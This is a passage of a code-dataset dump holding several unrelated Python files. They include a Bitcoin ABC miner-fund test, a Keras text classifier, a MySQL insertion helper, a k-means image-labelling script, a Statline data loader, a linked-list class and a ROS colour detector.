plt.imshow(images_arr[10*i,:,:],'Greys_r')\r\n plt.title(f'Image after {10*i} iterations for {p*100}% of weight damage')\r\n plt.show()\r\n \r\n plt.plot(rmse)\r\n plt.title(f'Plot of RMSE for 
{p*100}% of weight damage')\r\n plt.xlabel('Number of iterations')\r\n plt.ylabel('RMSE')\r\n plt.grid()\r\n plt.show()\r\n \r\nniter=50\r\nimages_arr,rmse=demo(niter,10,0,0) # for loading ball without damage\r\nshow(images_arr,rmse,niter,0)\r\n\r\nniter=100\r\nimages_arr,rmse=demo(niter,10,1,0.25) # for loading all images with 25% damage\r\nshow(images_arr,rmse,niter,0.25)\r\n\r\nimages_arr,rmse=demo(niter,10,1,0.5) # for loading all images with 50% damage\r\nshow(images_arr,rmse,niter,0.5)\r\n\r\nimages_arr,rmse=demo(niter,10,1,0.8) # for loading all images with 75% damage\r\nshow(images_arr,rmse,niter,0.8)","sub_path":"Hopfield network/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"231513565","text":"#!/usr/bin/env python3\n# Copyright (c) 2020 The Bitcoin developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\nfrom decimal import Decimal\n\nfrom test_framework.blocktools import create_block, create_coinbase\nfrom test_framework.messages import ToHex\nfrom test_framework.test_framework import BitcoinTestFramework\nfrom test_framework.util import assert_equal, assert_greater_than_or_equal\n\nAXION_ACTIVATION_TIME = 2000000600\n\nMINER_FUND_RATIO = 8\n\nMINER_FUND_ADDR = 'ecregtest:pqnqv9lt7e5vjyp0w88zf2af0l92l8rxdgz0wv9ltl'\n\n\nclass MinerFundTest(BitcoinTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 1\n self.extra_args = [[\n '-enableminerfund',\n '-axionactivationtime={}'.format(AXION_ACTIVATION_TIME),\n ]]\n\n def run_test(self):\n node = self.nodes[0]\n address = node.get_deterministic_priv_key().address\n\n self.log.info('Create some history')\n for _ in range(0, 50):\n node.generatetoaddress(1, address)\n\n node = self.nodes[0]\n address = node.get_deterministic_priv_key().address\n\n # Move MTP forward to axion activation\n node.setmocktime(AXION_ACTIVATION_TIME)\n node.generatetoaddress(6, address)\n assert_equal(\n node.getblockchaininfo()['mediantime'],\n AXION_ACTIVATION_TIME)\n\n # Let's remember the hash of this block for later use.\n fork_block_hash = int(node.getbestblockhash(), 16)\n\n def get_best_coinbase():\n return node.getblock(node.getbestblockhash(), 2)['tx'][0]\n\n # No money goes to the fund.\n coinbase = get_best_coinbase()\n assert_equal(len(coinbase['vout']), 1)\n block_reward = coinbase['vout'][0]['value']\n\n # First block with the new rules.\n node.generatetoaddress(1, address)\n\n # Now we send part of the coinbase to the fund.\n coinbase = get_best_coinbase()\n assert_equal(len(coinbase['vout']), 2)\n assert_equal(\n coinbase['vout'][1]['scriptPubKey']['addresses'][0],\n MINER_FUND_ADDR)\n\n total = Decimal()\n for o in coinbase['vout']:\n total += o['value']\n\n assert_equal(total, block_reward)\n assert_greater_than_or_equal(\n coinbase['vout'][1]['value'],\n (MINER_FUND_RATIO * total) / 100)\n\n # Invalidate top block, submit a custom block that do not send anything\n # to the fund and check it is rejected.\n node.invalidateblock(node.getbestblockhash())\n\n block_height = node.getblockcount() + 1\n block = create_block(\n fork_block_hash, create_coinbase(block_height), AXION_ACTIVATION_TIME + 1, version=4)\n block.solve()\n\n assert_equal(node.submitblock(ToHex(block)), 'bad-cb-minerfund')\n\n\nif __name__ == '__main__':\n 
MinerFundTest().main()\n","sub_path":"test/functional/abc_feature_minerfund.py","file_name":"abc_feature_minerfund.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"280243948","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nfrom PySide6.QtCore import QObject\n\nfrom bsmu.vision.core.plugins.base import Plugin\nfrom bsmu.vision.core.image.layered import LayeredImage\nfrom bsmu.vision.core.palette import Palette\n\nif TYPE_CHECKING:\n from bsmu.vision.plugins.visualizers.manager import DataVisualizationManagerPlugin, DataVisualizationManager\n from bsmu.vision.plugins.loaders.manager import FileLoadingManagerPlugin, FileLoadingManager\n\n\nclass ImageViewerIntersectionOverlayerPlugin(Plugin):\n _DEFAULT_DEPENDENCY_PLUGIN_FULL_NAME_BY_KEY = {\n 'data_visualization_manager_plugin': 'bsmu.vision.plugins.visualizers.manager.DataVisualizationManagerPlugin',\n 'file_loading_manager_plugin': 'bsmu.vision.plugins.loaders.manager.FileLoadingManagerPlugin',\n }\n\n def __init__(\n self,\n data_visualization_manager_plugin: DataVisualizationManagerPlugin,\n file_loading_manager_plugin: FileLoadingManagerPlugin,\n ):\n super().__init__()\n\n self._data_visualization_manager_plugin = data_visualization_manager_plugin\n self._data_visualization_manager: DataVisualizationManager | None = None\n\n self._file_loading_manager_plugin = file_loading_manager_plugin\n self._file_loading_manager: FileLoadingManager | None = None\n\n self._overlayer: ImageViewerIntersectionOverlayer | None = None\n\n def _enable(self):\n self._data_visualization_manager = self._data_visualization_manager_plugin.data_visualization_manager\n self._file_loading_manager = self._file_loading_manager_plugin.file_loading_manager\n\n self._overlayer = ImageViewerIntersectionOverlayer(\n self._data_visualization_manager,\n self._file_loading_manager,\n self.config.value('layers'),\n self.config.value('intersection-layer'),\n )\n\n self._data_visualization_manager.data_visualized.connect(\n self._overlayer.overlay_sibling_dirs_mask_intersection)\n\n def _disable(self):\n self._data_visualization_manager.data_visualized.disconnect(\n self._overlayer.overlay_sibling_dirs_mask_intersection)\n\n self._overlayer = None\n\n\nclass ImageViewerIntersectionOverlayer(QObject):\n def __init__(\n self,\n visualization_manager: DataVisualizationManager,\n loading_manager: FileLoadingManager,\n layers_properties: dict,\n intersection_layer_properties: dict,\n ):\n super().__init__()\n\n self.visualization_manager = visualization_manager\n self.loading_manager = loading_manager\n self.layers_properties = layers_properties\n self.intersection_layer_properties = intersection_layer_properties\n\n def overlay_sibling_dirs_mask_intersection(self, data: Data, data_viewer_sub_windows: DataViewerSubWindow):\n if isinstance(data, LayeredImage):\n first_layer = data.layers[0]\n first_layer_image_name = first_layer.image_path.name\n layers_dir = first_layer.path.parent\n\n intersection_image = None\n intersection_layer_index = len(self.layers_properties) + 1\n # First row is all zeros color (empty mask), last row is for intersection mask color\n intersection_palette_array = np.zeros(shape=(intersection_layer_index + 1, 4), dtype=np.uint8)\n\n for i, (new_layer_name, layer_properties) in enumerate(self.layers_properties.items()):\n new_layer_image_path = layers_dir / new_layer_name / first_layer_image_name\n 
layer_index = i + 1\n if new_layer_image_path.exists():\n color_property = layer_properties.get('color')\n intersection_palette_array[layer_index] = color_property\n new_image = self.loading_manager.load_file(new_layer_image_path)\n\n if intersection_image is None:\n new_image.array[new_image.array > 0] = layer_index\n intersection_image = new_image\n else:\n masked_new_image = new_image.array > 0\n intersection_image.array[np.logical_and(intersection_image.array > 0, masked_new_image)] = intersection_layer_index\n intersection_image.array[np.logical_and(intersection_image.array == 0, masked_new_image)] = layer_index\n\n print('LEN', len(self.layers_properties))\n\n if intersection_image is not None:\n print('II', np.unique(intersection_image.array))\n intersection_palette_array[intersection_layer_index] = self.intersection_layer_properties['color']\n print('palette', intersection_palette_array)\n intersection_image.palette = Palette(intersection_palette_array)\n intersection_layer = data.add_layer_from_image(intersection_image, self.intersection_layer_properties['name'])\n\n intersection_layer_opacity = self.intersection_layer_properties['opacity']\n for data_viewer_sub_window in data_viewer_sub_windows:\n layered_image_viewer = data_viewer_sub_window.viewer\n layered_image_viewer.layer_view_by_model(intersection_layer).opacity = intersection_layer_opacity\n","sub_path":"vision-plugins/src/bsmu/vision/plugins/overlayers/intersection.py","file_name":"intersection.py","file_ext":"py","file_size_in_byte":5384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218722214","text":"import numpy as np\nfrom tensorflow.keras.preprocessing.text import Tokenizer\n\n\ndocs = ['너무 재밌습니다', '참 최고입니다', '참 잘 만든 영화입니다', '추천하고 싶은 영화입니다', '한 번 더 보고 싶습니다',\n '글쎄요', '별로입니다', '생각보다 지루합니다', '연기가 어색합니다', '재미없습니다', ' 너무 재미없다', \n '참 재밌습니다', '청순이가 잘 생기긴 했어요']\n\n# 라벨링 -> 긍정: 1, 부정: 0 \nlabels = np.array([1,1,1,1,1,0,0,0,0,0,0,1,1])\ntoken = Tokenizer()\ntoken.fit_on_texts(docs)\n# print(token.word_index) \n'''\n{'참': 1, '너무': 2, '재밌습니다': 3, '잘': 4, '영화입니다': 5, '최고입니다': 6, '만든': 7, '추천\n하고': 8, '싶은': 9, '한': 10, '번': 11, '더': 12, '보고': 13, '싶습니다': 14, '글쎄요': 15, '별 \n로입니다': 16, '생각보다': 17, '지루합니다': 18, '연기가': 19, '어색합니다': 20, '재미없습니다': \n21, '재미없다': 22, '청순이가': 23, '생기긴': 24, '했어요': 25}\n'''\n\nx = token.texts_to_sequences(docs)\n# print(x) # [[2, 3], [1, 6], [1, 4, 7, 5], [8, 9, 5], [10, 11, 12, 13, 14], [15], [16], [17, 18], [19, 20], [21], [2, 22], [1, 3], [23, 4, 24, 25]]\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\npad_x = pad_sequences(x, padding='pre', maxlen=5)\n# print(pad_x, pad_x.shape)\n'''\n[[ 0 0 0 2 3][ 0 0 0 1 6][ 0 1 4 7 5][ 0 0 8 9 5][10 11 12 13 14][ 0 0 0 0 15][ 0 0 0 0 16]\n[ 0 0 0 17 18][ 0 0 0 19 20][ 0 0 0 0 21][ 0 0 0 2 22][ 0 0 0 1 3][ 0 23 4 24 25]] \n(13, 5)\n '''\n\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Embedding, LSTM, Dense, Conv1D\n# print(len(token.word_index)) # 25\n# print(np.unique(pad_x)) # 0~25 -> 26\n\n# input = Input((5,))\n# a = Dense(2)(input)\n# output = Dense(1, activation='sigmoid')(a)\n# model = Model(inputs=input, outputs=output)\n\n# pad_x = pad_x.reshape(13, 5, 1)\n# input = Input((5,1))\n# a = Conv1D(2,2)(input)\n# output = Dense(1, activation='sigmoid')(a)\n# model = Model(inputs=input, outputs=output)\n\npad_x = pad_x.reshape(13, 5, 1)\ninput = Input((5,1))\na = LSTM(2)(input)\noutput = Dense(1, activation='sigmoid')(a)\nmodel = 
Model(inputs=input, outputs=output)\n\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['acc'])\nmodel.fit(pad_x, labels, epochs=39, batch_size=1)\n\nacc = model.evaluate(pad_x, labels)[1]\nprint('acc = ', acc)\n# acc = 0.6153846383094788\n# acc = 0.6730769276618958\n# acc = 0.9230769276618958\n","sub_path":"keras01/keras52_no_embedding.py","file_name":"keras52_no_embedding.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"183795614","text":"# -*-coding:utf-8 -*-\n# time: 2018.3.22\n\nimport pymysql\nimport datetime\nimport logging\n\n\nclass get_Mysql(object):\n def __init__(self, dbname, xls_name):\n self.dbname = dbname\n self.T = datetime.datetime.strftime(datetime.datetime.now(), \"%Y%m%d%H%M\")\n # 数据表的名称\n self.table_name = '{}'.format(xls_name)\n # 连接接数据库\n self.conn = pymysql.connect(\n host='127.0.0.1',\n user='root',\n password='1219960386',\n port=3306,\n db=self.dbname,\n charset='utf8'\n )\n # 获取游标\n self.cursor = self.conn.cursor()\n\n def create_table(self):\n \"\"\"\n 创建数据表的函数,表格名称按照时间和关键词命名\n \"\"\"\n sql = '''CREATE TABLE `{tbname}` (\n `id` int(10) unsigned NOT NULL AUTO_INCREMENT,\n {biddingMethod} varchar(20) DEFAULT NULL COMMENT '招标方式',\n {biddingCycle} varchar(20) DEFAULT NULL COMMENT '招标周期',\n {identifier} varchar(255) DEFAULT NULL COMMENT '编号',\n {hbrainCategory} varchar(255) DEFAULT NULL COMMENT '物料总类',\n {orderedItem} varchar(255) DEFAULT NULL COMMENT '物料名称',\n {orderedItemIdentifier} varchar(255) DEFAULT NULL COMMENT '物料编码',\n {itemCondition} varchar(255) DEFAULT NULL COMMENT '规格',\n {customer} varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL COMMENT '使用企业',\n {seller} varchar(255) DEFAULT NULL COMMENT '中标人/供应商',\n {orderDate} datetime DEFAULT NULL COMMENT '开标时间/单据日期',\n {price} varchar(255) DEFAULT NULL COMMENT '中标价/采购单价',\n {totalUnit} varchar(255) DEFAULT NULL COMMENT '采购数量',\n {totalPrice} varchar(255) DEFAULT NULL COMMENT '中标金额/采购总价',\n PRIMARY KEY (`id`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n'''\n try:\n self.cursor.execute(sql.format(tbname=self.table_name, biddingMethod=\"biddingMethod\",\n biddingCycle=\"biddingCycle\", identifier=\"identifier\",\n hbrainCategory=\"hbrainCategory\", orderedItem=\"orderedItem\",\n orderedItemIdentifier=\"orderedItemIdentifier\", itemCondition=\"itemCondition\",\n customer=\"customer\", seller=\"seller\", orderDate=\"orderDate\",\n price=\"price\", totalUnit=\"totalUnit\", totalPrice=\"totalPrice\",))\n except Exception as e:\n logging.warning(e)\n print(\"创建数据表失败,表格可能已经存在!\", e)\n else:\n self.conn.commit()\n print(\"成功创建一个数据表,名称是{}\".format(self.table_name))\n\n def insert_data(self, data):\n \"\"\"数据插入\"\"\"\n insert_sql = '''INSERT INTO `{tbname}`(biddingMethod, biddingCycle, identifier, hbrainCategory, orderedItem,\n orderedItemIdentifier, itemCondition, customer, seller, orderDate,\n price, totalUnit, totalPrice) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) \n '''\n try:\n self.cursor.execute(insert_sql.format(tbname=self.table_name),\n (data['biddingMethod'], data['biddingCycle'], data['identifier'],\n data['hbrainCategory'], data['orderedItem'], data['orderedItemIdentifier'],\n data['itemCondition'], data['customer'], data['seller'],\n data['orderDate'], data['price'], data['totalUnit'], data['totalPrice']))\n\n except Exception as e:\n self.conn.rollback()\n print(\"Insert data failure, cause:\", e)\n logging.warning(e)\n\n else:\n self.conn.commit()\n 
print('Insert a data successfully!')\n\n    def close_table(self):\n        print(\"End of data insert !\")\n        self.cursor.close()\n        self.conn.close()\n\n\nif __name__ == '__main__':\n    \"\"\"\n    测试\n    \"\"\"\n    data = {'biddingMethod': '线上招标', 'biddingCycle': '月度招标', 'identifier': 'ZB-ZY-ZY-1802002-1',\n            'hbrainCategory': '中药', 'orderedItem': '月度招标', 'orderedItemIdentifier': 'ZB-ZY-ZY-1802002-1',\n            'itemCondition': '月度招标', 'customer': '中药二厂', 'seller': '安国义通中药材有限公司',\n            'orderDate': '2018/2/6', 'price': '21', 'totalUnit': '1000', 'totalPrice': '0.53'}\n\n    my = get_Mysql('market_price',\n                   'test1')\n    my.create_table()\n    my.insert_data(data)\n    my.close_table()\n\n","sub_path":"xls_to_sql/save_data/connect_to_mysql.py","file_name":"connect_to_mysql.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"289787775","text":"import sys\r\nimport unittest\r\n\r\nsys.path.append('../')\r\n\r\nfrom challenge.cache.fileCache import FileCache\r\n\r\ncacheClient = FileCache()\r\n\r\n\r\nclass TestFileEmpty(unittest.TestCase):\r\n\tdef test_file_empty(self):\r\n\t\tis_file_empty = cacheClient.is_file_empty()\r\n\t\tself.assertEqual(False, is_file_empty)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tunittest.main()\r\n","sub_path":"tests/test_if_filecache_empty.py","file_name":"test_if_filecache_empty.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"284419929","text":"import models as m\nimport sqlRepo as repo\n\n\n\ndef Main():\n    repo.DBTestFunction()\n    \n    #TestFunc3()\n    \n\n\ndef TestFunc3():\n    a= \" abc\" * 4\n    print(a)\n    print(len(a))\n\n\n\ndef testFunc():\n    arr= ['abc','cde','efg']\n    print(arr[1])\n    print(len(arr))\n    print(arr)\n\n    for x in arr:\n        print(x) \n\n\nclass myclass:\n    x=1\n    y=\"fahim\"\n\ndef testFunc2():\n    a = myclass()\n    a.x=5\n\n    print(a.x,a.y)\n\n    theList=[]\n    for x in range(10):\n        id = x\n        num = x * 321\n        name = \"fahim\" + str(num)\n\n        d = m.Patient(id,num,name)\n        theList.append(d)\n\n\n        # print(d.Name,d.CellNumber,d.Id)\n    print(len(theList))\n    selected = None\n    for x in theList:\n        if(x.Id == 3):\n            selected = x\n            break\n\n\n\n    print(selected.CellNumber)\n\n\n\nMain()","sub_path":"hello/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"401046434","text":"import h5py\nimport numpy as np\nfrom imageio import imwrite\nfrom sklearn.cluster import KMeans\nfrom model_data import Model_data\nfrom helpers import cat_image_to_gray\nimport os.path\nimport config\nimport random\n\nh5s = config.get_h5(ignore_1_2=True)\n\ndatam = Model_data(\n    kernel_size=(9, 9, 1), remove_unlabeled=False, one_hot=False,\n    flat_features=True, from_h5=True, bag_size=1, annotation_groupname=\"\")\ndatam2 = Model_data(\n    kernel_size=(1, 1, 1), remove_unlabeled=False, one_hot=False,\n    flat_features=True, from_h5=True, bag_size=1, annotation_groupname=\"\")\n\n\nh5s = {str(fn): h5py.File(config.data_path + str(fn) + \".h5\", \"a\")\n       for fn in range(1, 6)}\n\ndatam.bag_size = 1\nX = []\nmodel = KMeans(n_clusters=16, n_jobs=30,\n               precompute_distances=True)\n\n\ndef to_rgb1a(im):\n    w, h = im.shape\n    ret = np.empty((w, h, 3), dtype=np.uint8)\n    ret[:, :, 2] = ret[:, :, 1] = ret[:, :, 0] = im\n    return ret\n\n\ndef func(x):\n    h5f, df = x\n    if len(df) > 6 or random.uniform(0, 1) < 0.95:\n        return False\n    fname = \"%s%s/%s_pred.png\" % (\n        config.kmeans_path, h5f.filename[-4], df)\n    if os.path.isfile(fname):\n        return True\n    print(x)\n    image, _ = datam.handle_images([(h5f, df)])\n    if np.sum(image) == 0:\n        print(\"Empty\")\n        return False\n    model.fit(image)\n    pred = model.predict(image)\n    uniques = np.unique(pred, return_counts=True)\n    if len(uniques[0]) < 16:\n        return False\n    model.init = model.cluster_centers_\n    pred = pred.reshape(1024, 1024)\n    imwrite(fname, pred)\n    image, _ = datam2.handle_images([(h5f, df)])\n    image = image.reshape(1024, 1024)\n    image = to_rgb1a(image.astype(np.uint8))\n    fname = \"%s/kmeans_labels/%s/%s.png\" % (\n        config.data_path, h5f.filename[-4], df)\n    imwrite(fname, image)\n    return True\n\n\nfor h5fn in config.h5s[2:]:\n    h5f = h5py.File(h5fn, 'r+')\n    [func((h5f, df)) for df in h5f.keys()]\n","sub_path":"labels/kmeans3.py","file_name":"kmeans3.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"41394566","text":"from datetime import datetime\n\n\nclass Record:\n    def __init__(self, email=None, atime=None, subject=None, author=None, url=None, text=None):\n        self.id = None\n        self.email = email\n        self.cnt = 1\n        self.time = atime\n        self.subject = subject\n        self.author = author\n        self.url = url\n        self.text = text\n\n    @staticmethod\n    def clearstr(s):\n        s = s.strip()\n        if len(s) == 0:\n            return 'NA'\n        return s\n\n    def load(self, record):\n        self.id = Record.clearstr(record[\"_id\"])\n        self.email = Record.clearstr(record[u\"email\"])\n        self.subject = Record.clearstr(record[u\"subject\"])\n        self.author = Record.clearstr(record[u\"author\"])\n        self.cnt = record[u\"cnt\"]\n        self.time = record[u\"time\"]\n        self.url = record.get('url')\n        self.text = record.get('text')\n        return self\n\n    def dump(self):\n        return {\n            u\"_id\": self.id,\n            u\"email\": self.email,\n            u\"cnt\": self.cnt,\n            u\"time\": self.time,\n            u\"subject\": self.subject,\n            u\"author\": self.author,\n            u\"url\": self.url,\n            u\"text\": self.text\n        }","sub_path":"Record.py","file_name":"Record.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"373720677","text":"def notas(*n, sit=False):\n    \"\"\"\n\n    :param n: Notas do Aluno\n    :param sit: (Se sit=True) mostra a situação do aluno\n    :return: Retorna uma biblioteca que nela se encontra o total de notas, maior nota, menor, média e situação (se sit=True)\n    \"\"\"\n    aluno = dict()\n    aluno['total'] = len(n)\n    aluno['maior'] = max(n)\n    aluno['menor'] = min(n)\n    aluno['media'] = sum(n) / len(n)\n    if sit:\n        if aluno['media'] <= 6:\n            aluno['situação'] = 'RUIM'\n        elif aluno['media'] > 6 and aluno['media'] <= 7:\n            aluno['situação'] = 'RAZOÁVEL'\n        elif aluno['media'] > 7:\n            aluno['situação'] = 'BOA'\n\n    return aluno\n\n\n\nresp = notas(3, 2, 5, 7, 9, sit=True)\nprint(resp)\n","sub_path":"Projetos Python/Aulas Python/aula 21/Desafio 105.py","file_name":"Desafio 105.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"414327449","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Import modules\nfrom logger import setup_custom_logger\nfrom file_writer import file_writer\nimport sys\nimport pandas as pd\nimport cbsodata\nimport datetime\nfrom msg import *\n\n\n# Setup of logger\ntry:\n    logger = setup_custom_logger(\"B003_Permits_New_Houses\")\n    
logger.info(\"---------------------------------------------------\")\n logger.info(txtStarting + \" \" + logger.name)\nexcept:\n logger.exception(\"logger could not be loaded\")\n raise\n\n\ntry:\n # Get current date information\n now = datetime.datetime.now()\n\n yearMin = now.year - 4\n yearMax = now.year\n\n # Values you can load\n # now.year\n # now.month\n # now.day\n # now.hour\n # now.minute\nexcept:\n logger.exception(\"datetime could not be loaded\")\n logger.info(\"set yearmin to a default value\")\n # Set default values for fallback\n yearMin = 2010\n yearMax = 2030\n raise\n\n\n# Dataset 83668NED\ndataset_id = \"83668NED\"\n\n# Table definitions\n# Woningen_1 = Bouwvergunningen_woonruimten_Woningen\n# Wooneenheden_2 = Bouwvergunningen_woonruimten_Wooneenheden\n# Recreatiewoningen_3 = Bouwvergunningen_woonruimten_Recreatiewoningen\n\n\ntry:\n logger.info(f\"Retrieve data from dataset {dataset_id}\")\n data = pd.DataFrame(\n cbsodata.get_data(\n f\"{dataset_id}\",\n filters=f\"substring(Perioden,0,4) ge '{yearMin}'\",\n select=[\"Perioden\", \"Woningen_1\", \"Wooneenheden_2\", \"Recreatiewoningen_3\"],\n )\n )\nexcept:\n logger.exception(\"error loading data from CBS Statline\")\n raise\n\n\n# Rename columns\ntry:\n data = data.rename(\n columns={\n \"Woningen_1\": \"Bouwvergunningen_woonruimten_Woningen\",\n \"Wooneenheden_2\": \"Bouwvergunningen_woonruimten_Wooneenheden\",\n \"Recreatiewoningen_3\": \"Bouwvergunningen_woonruimten_Recreatiewoningen\",\n }\n )\n\nexcept:\n logger.exeption(\"Columns could not be renamed\")\n raise\n\n\n# Date formatting and quarter format\ntry:\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" januari\", \"-01\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" februari\", \"-02\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" maart\", \"-03\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" april\", \"-04\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" mei\", \"-05\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" juni\", \"-06\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" juli\", \"-07\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" augustus\", \"-08\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" september\", \"-09\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" oktober\", \"-10\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" november\", \"-11\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" december\", \"-12\")\n data[\"Perioden\"] = pd.to_datetime(data[\"Perioden\"]).dt.date\nexcept:\n logger.exception(\n \"Columns could not be changed to monthly numbers or formatted to different date\"\n )\n raise\n\n\n# Export dataFrame to Excel file\ntry:\n file_writer(data, \"B003_Permits_New_Houses\")\n logger.info(txtDone)\nexcept:\n logger.exception(\"dataFrame could not be exported to output folder\")\n","sub_path":"sse-aai-zsa/Zsa/scripts/B003_Permits_New_Houses.py","file_name":"B003_Permits_New_Houses.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"19489808","text":"class Node:\r\n def __init__(self, data=None, next=None):\r\n self.data = data\r\n self.next = next\r\n\r\n def __repr__(self):\r\n return repr(self.data)\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n\r\n # Display the linked list\r\n def __repr__(self):\r\n temp = self.head\r\n nodes = []\r\n while temp:\r\n 
nodes.append(repr(temp))\r\n temp = temp.next\r\n return '[' + ', '.join(nodes) + ']'\r\n\r\n # Insert in the linked list\r\n def append(self, data):\r\n if not self.head:\r\n self.head = Node(data=data)\r\n return\r\n temp = self.head\r\n while temp.next:\r\n temp = temp.next\r\n temp.next = Node(data=data)\r\n\r\n # Insert in the beginning of the linked list\r\n def appendleft(self, data):\r\n self.head = Node(data=data, next=self.head)\r\n\r\n # Find the element in the linked list\r\n def find(self, key):\r\n temp = self.head\r\n while temp and temp.data != key:\r\n temp = temp.next\r\n return temp\r\n\r\n # Delete the element from the linked list\r\n def delete(self, key):\r\n temp = self.head\r\n prev = None\r\n while temp and temp.data != key:\r\n prev = temp\r\n temp = temp.next\r\n if not prev:\r\n self.head = temp.next\r\n elif temp:\r\n prev.next = temp.next\r\n temp = None\r\n else:\r\n print(f'{key} not found')\r\n\r\n # Reverse the linked list\r\n def reverse(self):\r\n temp = self.head\r\n prev_node = None\r\n next_node = None\r\n while temp:\r\n next_node = temp.next\r\n temp.next = prev_node\r\n prev_node = temp\r\n temp = next_node\r\n self.head = prev_node\r\n\r\n\r\nif __name__ == '__main__':\r\n ll = LinkedList()\r\n ll.append(1998)\r\n ll.append('A-geeky-man')\r\n ll.append('GitHub')\r\n ll.appendleft('Jan')\r\n ll.appendleft(20)\r\n print(ll) # printing the original linked list\r\n ll.reverse()\r\n print(ll) # printing the reversed linked list\r\n print(ll.find(20)) # printing the found element\r\n print(ll.find('GitHub')) # printing the found element\r\n ll.delete(1998)\r\n print(ll) # printing the linked list after deleting an element\r\n ll.reverse()\r\n print(ll) # printing the reversed linked list\r\n","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"295290849","text":"#!/usr/bin/env python\n\nimport rospy, cv2\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy as np\nfrom std_msgs.msg import Int32\nclass Red:\n def __init__(self):\n self.lower = np.array([150, 50, 50])\n self.upper = np.array([180, 255, 255])\n\nclass red_pick():\n def __init__(self):\n sub = rospy.Subscriber(\"/ardrone/front/image_raw\",Image,self.get_image)\n self.bridge = CvBridge()\n self.image_org = None\n self.pub = rospy.Publisher(\"red\",Image,queue_size=1)\n self.posi_pub = rospy.Publisher(\"posi\",Int32,queue_size=1)\n\n def monitor(self,rect,org):\n if rect is not None:\n self.pub.publish(self.bridge.cv2_to_imgmsg(org,\"bgr8\"))\n\n def get_image(self,img):\n try:\n self.image_org = self.bridge.imgmsg_to_cv2(img,\"bgr8\")\n except CvBridgeError as e:\n rospy.logerr(e)\n\n\n def detectRectOfTargetColor(self,frame, colorObj):\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n h = hsv[:, :, 0]\n s = hsv[:, :, 1]\n mask = np.zeros(h.shape, dtype=np.uint8)\n mask = cv2.inRange(hsv, colorObj.lower, colorObj.upper)\n\n image, contours, hierarchy = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n \n rects = []\n\n\n for contour in contours:\n approx = cv2.convexHull(contour)\n rect = cv2.boundingRect(approx)\n rects.append(np.array(rect))\n\n return rects\n\n def pick_check(self):\n if self.image_org is None:\n return None\n \n frame = self.image_org\n\n rects_red = self.detectRectOfTargetColor(frame, Red())\n\n \n\n \n if len(rects_red) > 0:\n rect = max(rects_red, key=(lambda x: 
